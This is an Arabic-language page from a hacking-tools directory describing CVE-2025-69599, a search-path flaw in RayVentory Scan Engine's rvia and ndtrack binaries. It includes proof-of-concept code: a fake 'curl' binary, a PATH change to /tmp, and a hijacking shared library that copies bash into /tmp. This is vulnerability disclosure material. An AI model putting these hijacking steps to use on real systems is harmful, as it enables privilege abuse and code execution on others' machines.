Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-69599 | Kitploit
أدوات/GitHubGitHub/wise-security/cve-2025-69599
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقتحليل الملفات الثنائيةأمن سلسلة التوريد
GitHubwise-security/cve-2025-69599

CVE-2025-69599

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-69599

  • المؤلف: Rafael José Núñez Gulías
  • الشركة: Iberian Var Group
  • المنتجات المتأثرة: RayVentory Scan Engine 12.6 Update 8 والإصدارات السابقة
  • استشارة Raynet: RSEC200965

rvia في Raynet عرضة لمشكلة عنصر مسار بحث غير خاضع للتحكم (Uncontrolled Search Path Element). عند تحميل الكائنات المشتركة واستدعاء ثنائيات النظام (مثل .so والثنائيات المساعدة)، يتم استدعاؤها باستخدام مسارات نسبية، مما يسمح للمستخدم بالعبث بالثنائي أو كائن .so النهائي الذي يتم تنفيذه من خلال التلاعب بمتغير البيئة PATH.

20251117223200.png

في الدليل التالي، يتم إنشاء ثنائي عشوائي يسمى curl في دليل /tmp.

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>

int main() {
	system("whoami");
	return 0;
}
root@kitploit:~
gcc curl.c -o curl # Compiling the binary

يتم تغيير متغير PATH بحيث يكون أول دليل يتم البحث فيه عن أمر curl عند استدعائه بواسطة rvia هو /tmp.

root@kitploit:~
export PATH=/tmp:$PATH

وبعد ذلك، فإن استدعاء /opt/rvia/rvia getconfig سيستخدم ثنائي curl المعدل (المعبث به) الخاص بنا.

20251209121335.png

وينطبق الأمر نفسه على خيار upload.

20251209121709.png

تم العثور على المشكلة نفسها عند استخدام الخيار rvia inventory الذي يستدعي داخليًا الثنائي ndtrack. يقوم الثنائي ndtrack باستدعاء الأمرين cat وsh باستخدام مسار نسبي.

20251117223833.png

20251224134109.png

أخيرًا، تم اكتشاف أيضًا أن الثنائي ndtrack يشمل كائنات مشتركة (ملفات .so)، باستخدام مسارات نسبية.

20251118093146.png

في الدليل التالي، يمكن رؤية الخطوات المتخذة لاستبدال الاستدعاء النسبي إلى libnetselector.so (من الممكن أيضًا تنفيذ الإجراءات نفسها مع libuploader.so). في هذه الحالة، يتم إنشاء كائن مشترك مخصص، وعند تنفيذ هذا الكائن المشترك، سيتم إنشاء نسخة من bash في دليل /tmp باسم bash_so_hijack.

فيما يلي كود C لإنشاء الكائن المشترك المخصص المسمى libnetselector.so

root@kitploit:~
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
	setuid(1001);
	setgid(1001);
	system("cp /bin/bash /tmp/bash_so_hijack");
}
root@kitploit:~
gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # compiling the shared object

20251209131403.png

من المهم ملاحظة أن هذا يعمل فقط عند استدعاء ndtrack مباشرة، لأنه عند استدعاء خيار inventory، يتم إجراء استدعاء إلى سكربت bash في /opt/rvia يسمى ndtrack، والذي يعيّن متغير البيئة PATH قبل استدعاء الثنائي ndtrack.

20251223190146.png

تنزيل الأداة